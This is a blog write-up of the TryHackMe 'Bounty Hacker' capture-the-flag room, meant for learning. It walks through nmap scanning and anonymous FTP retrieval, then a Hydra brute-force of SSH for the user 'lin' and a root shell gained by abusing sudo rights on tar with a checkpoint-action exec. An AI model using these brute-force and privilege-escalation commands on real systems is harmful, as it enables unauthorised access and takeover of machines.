In this blog post, I'll share my experience tackling the "Bounty Hacker" challenge on TryHackMe, a beginner-friendly Capture The Flag (CTF) exercise designed to enhance skills in enumeration, password cracking, and privilege escalation. The primary focus of this challenge is on exploiting weak credentials and leveraging misconfigurations to gain root access.
The key vulnerabilities exploited in this challenge include:
Weak Credentials: The use of easily guessable passwords allowed unauthorized access to services.
Misconfigured Sudo Permissions: Improper configuration of sudo privileges enabled privilege escalation to the root user.
These vulnerabilities exist due to poor security practices, such as inadequate password policies and improper configuration of user privileges, which can lead to unauthorized system access in real-world scenarios.
I began by deploying the "Bounty Hacker" machine and identifying its IP address. Using Nmap, I scanned for open ports and services:
nmap -sC -sV -oN nmap_scan.txt <target_ip>
The scan revealed the following open ports:
Port 21 (FTP): vsftpd 3.0.3 (Anonymous FTP login allowed)
Port 22 (SSH): OpenSSH 7.2p2
Port 80 (HTTP): Apache httpd 2.4.18
Navigating to http://<target_ip>, I found a simple webpage mentioning names like Spike, Jet, Ed, and Faye. These could potentially be usernames, so I noted them for future reference. Inspecting the page source did not reveal any additional information.
Given that anonymous FTP login was allowed, I connected to the FTP server. Logging in as anonymous, I listed the available files:
ftp> ls
locks.txt
task.txt
I downloaded both files to my local machine:
ftp> get locks.txt
ftp> get task.txt
Examining task.txt revealed:
1. Protect Vicious.
2. Plan for Red Eye pickup on the Moon.
3. Lock down the ftp server.
4. Reformat the secondary storage drives.
5. Ask Lin for the ssh details.
This indicated that Lin might be a valid username. The locks.txt file contained a list of potential passwords, which I saved for later use.
With the username lin and a list of potential passwords, I used Hydra to brute-force SSH login:
hydra -l lin -P locks.txt ssh://<target_ip>
After some time, Hydra successfully found the password for lin.
Using the obtained credentials, After logging in, I listed the contents of the home directory and found the user.txt flag:
lin@bountyhacker:~$ cat user.txt
<user_flag>
To escalate privileges, I checked the sudo permissions for lin:
lin@bountyhacker:~$ sudo -l
Matching Defaults entries for lin on bountyhacker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User lin may run the following commands on bountyhacker:
(root) /bin/tar
This indicated that lin could execute /bin/tar as root. Using GTFOBins, I found a method to escalate privileges using tar:
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
Executing this command provided a root shell. I then navigated to the /root directory and retrieved the root.txt flag:
root@bountyhacker:~# cat root.txt
<root_flag>